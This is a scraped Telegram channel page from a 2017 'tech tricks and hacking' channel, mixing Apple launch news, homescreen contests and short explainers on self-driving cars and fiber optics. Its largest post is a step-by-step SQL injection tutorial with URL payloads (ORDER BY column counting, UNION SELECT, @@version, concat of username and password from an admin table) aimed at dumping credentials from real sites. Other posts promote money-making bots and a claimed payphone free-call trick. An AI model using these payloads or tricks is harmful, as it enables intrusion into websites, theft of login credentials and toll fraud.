Tech Byte
5.11K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
The iPhone 8 is confirmed to be released at 10 a.m., September 12, 2017 at the Steve Jobs Theater in Cupertino.

@techBYTE
Homescreen Setup3 from @CoolKiddo

Nova Launcher Prime
Zooper Widget Pro
Nougat Icon Packs

@techBYTE #SetupWars
Homescreen Setup2 from @daniellartey

He used Rainmeter on PC. Smooth desktop setup

@techBYTE #SetupWars
Homescreen Setup1 still from @daniellartey

Used Nova Launcher Prime on Android

@techBYTE #SetupWars
This is just the beginning, we'll hold more "contests" in the future and the winners may even get rewards. Keep sharing this channel, join our group, @GEEKernel, if you haven't and have fun.

Text me, @romL3N, to decide what the next #SetupWars will be about. PCs, Custom ROMs, desktop skins, consoles,...etc. Ciao!
Hacking - The No-Nonsense Guide @techbyte.pdf
968.9 KB
Hacking: The No-Nonsense Guide

Learn Hacking within 12 hours with this guide. You'll need Kali Linux dual booted, in a live disk or a virtual machine.

Happy Hacking!
- @techBYTE
As I promised Today Will Show You How To Find Bug On Site!
Check for vulnerability It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential Information etc...( In shortly). Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if is vulnerable we add to the end of url ' (quote), and that would be http://www.site.com/news.php?id=5' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." Or something similar That means is vulnerable to sql injection :) Step 2:- Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (We get message like this Unknown column '4' in 'order clause' or something like that) That means that the it has 3 columns, because we got an error on 4. Step 3:- Check for UNION function
With union we can select more data in one sql statement. So we have http://www.site.com/news.php?id=5 union all select 1,2,3/* 2010 (We already found that numbers of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works Step 4:- Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. Let’s say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version () and get something like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." I didn't see any paper covering this problem, so i must write it . Step 5:- Getting table and column name What we need is convert () function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex () and unhex () i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* And you will get MySQL version. Well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe for MySQL > 5 version. We must guess table and column name in most cases. Common table names are: user/s, admin/s, and member/s ... common column names are: username, user, usr, username, password, pass, passwd, pwd etc... I.e. would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good ) We know that table admin exists... Now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column name) We get username displayed on screen, example would be admin, or superadmin etc... Now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (If you get an error, then try the other column name) We seen password on the screen in hash or plain-text, it depends of how the database is set up . i.e. md5 hash, mysql hash, sha1... Now we must complete quer
y to look nice :) For that we can use concat () function (it joins strings) i.e. http://www.site.com/news.php?id=5 union all select 1,concat (Username, 0x3a, password),3 from admin/* Note that I put 0x3a, its hex value for: (so 0x3a is hex value for colon) (There is another way for that, char (58), ASCII value for : )
Forwarded from RL channels
Earn Easy Money through Telegram

Telegram is a really good instant messaging platform, and thanks to the following bots, you can now easily make money through the app. It's simple and easy, just click all links and press Start!

1 » Pirate Game Bot

2 » Cash Robots

3 » Dino Game Bot
Apple Event Announcements

- iPhone X (pronounced iPhone Ten) with 64/256GB variants set to release on November 3, starting at $999
- AirPower wireless charging coming out in 2018
- iPhone 8 and 8 Plus
- Animoji, animated emoji for iPhone X
- FaceID will work on ApplePay & third party apps
Hello🙌!This Is Kasahun
You want To Hack Coin Box(Calling)
Steps:
1.Insert Coin
2.Dial 0##Phone No. *(star)
3.Call Unlimited
4.And Disconnect
5.Coin Comes Out
Wow
It's Tried&Worked Successfully on Ethiopian Coin Box(calling Machines)!
Vivo V7 With 24-Megapixel Selfie Camera Goes on Sale for First Time in India Today.

📌 telgr.ml/DK9jFdP
Motorola confirms Android 8.0 Oreo update for range of smartphones

📌telgr.ml/LHNwRNr
How do self driving cars work?

Various self-driving technologies have been developed by Google, Uber, Tesla, Nissan, and other major automakers, researchers, and technology companies.
While design details vary, most self-driving systems create and maintain an internal map of their surroundings, based on a wide array of sensors, like radar. Uber's self-driving prototypes use sixty-four laser beams, along with other sensors, to construct their internal map; Google's prototypes have, at various stages, used lasers, radar, high-powered cameras, and sonar.
Software then processes those inputs, plots a path, and sends instructions to the vehicle’s “actuators,” which control acceleration, braking, and steering. Hard-coded rules, obstacle avoidance algorithms, predictive modeling, and “smart” object discrimination (ie, knowing the difference between a bicycle and a motorcycle) help the software follow traffic rules and navigate obstacles.
Sensors generate a 3-dimensional map to aid navigation.
Partially-autonomous vehicles may require a human driver to intervene if the system encounters uncertainty; fully-autonomous vehicles may not even offer a steering wheel.
Self-driving cars can be further distinguished as being “connected” or not, indicating whether they can communicate with other vehicles and/or infrastructure, such as next generation traffic lights. Most prototypes do not currently have this capability.
How does an optical fiber work?

Imagine what they'd make of modern fiber-optic cables "pipes" that can carry telephone calls and emails right around the world in a seventh of a second! Photo: Light pipe: fiber optics means sending light beams down thin strands of plastic or glass by making them bounce repeatedly off the walls.
Fiber optics is faster than most other transmission mediums. The signal has a constrained loss rate, which means that very little of a signal is lost over rather long distances.